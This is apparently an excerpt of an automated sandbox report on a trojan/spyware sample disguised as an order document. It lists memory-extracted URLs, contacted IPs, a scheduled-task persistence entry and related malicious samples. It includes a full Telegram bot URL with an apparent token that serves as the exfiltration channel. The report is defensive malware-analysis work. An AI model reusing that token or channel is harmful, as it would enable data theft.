http://www.fontbureau.comF	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/T	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.come.comQO	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/K	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302319712.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302714801.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302783202.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302814290.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302586272.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302345072.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302546639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302387437.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302299146.0000000005F17000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302439715.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/	ORDER (6256 OS)#391 PI.exe, 00000004.00000002.565396808.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comto	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.302630012.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comonyT	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301420395.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301223897.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301313763.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301537024.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301444783.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301460866.0000000005F10000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300897558.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300940819.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304887480.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.html	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comtalik	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comW.TTF0	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.commB	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303017257.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303319313.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.303225948.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.como	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.comals	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comtop/	ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304315545.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304286522.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304257902.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304393632.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://VEVgTqSNHWikc.org	WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.org	ORDER (6256 OS)#391 PI.exe, 00000004.00000002.567037453.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000008.00000002.566476117.00000000032DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgMozilla/5.0	WsdnBq.exe, 00000008.00000002.565696055.0000000003271000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
54.91.59.199	unknown	United States	14618	AMAZON-AESUS	false
3.232.242.170	api.ipify.org.herokudns.com	United States	14618	AMAZON-AESUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	764027
Start date and time:	2022-12-09 10:18:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER (6256 OS)#391 PI.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@14/5@6/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 95% Number of executed functions: 125 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:19:10	API Interceptor	674x Sleep call for process: ORDER (6256 OS)#391 PI.exe modified
10:19:17	Task Scheduler	Run new task: WsdnBq path: C:\Users\user\AppData\Roaming\WsdnBq.exe
10:19:40	API Interceptor	428x Sleep call for process: WsdnBq.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
149.154.167.220	b861f2ee7472af453fac1c50c3fc4036.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.PWSX-gen.31371.23237.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Troj.Krypt-TF.20337.6044.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Garf.Gen.7.21386.6564.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win64.PWSX-gen.8563.27113.exe	Get hash	malicious	Browse
	PI No.7861612.pif.exe	Get hash	malicious	Browse
	SH-765433_pdf.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan-Dropper.MSIL.Agent.5276.27672.exe	Get hash	malicious	Browse
	Quotation required.exe	Get hash	malicious	Browse
	PO 0017709220.pdf (68KB).exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.1725.2046.4085.exe	Get hash	malicious	Browse
	filmora_setup.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.1725.7607.10943.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.1725.19553.28086.exe	Get hash	malicious	Browse
	wUPIJcl00e.exe	Get hash	malicious	Browse
	SOA.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.RATX-gen.27343.27281.exe	Get hash	malicious	Browse
	SOA.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.CrypterX-gen.9890.26534.exe	Get hash	malicious	Browse
	PO-23456543_pdf.exe	Get hash	malicious	Browse
54.91.59.199	qMvQDfPdl5.exe	Get hash	malicious	Browse	api.ipify.org/?format=sde
	8dnOOS7Lby.exe	Get hash	malicious	Browse	api.ipify.org/
	OIVv97kaO5.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	library.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
	XIiRHEaA9R.exe	Get hash	malicious	Browse	api.ipify.org/
	gf3YTNoH1Q.exe	Get hash	malicious	Browse	api.ipify.org/?format=xml
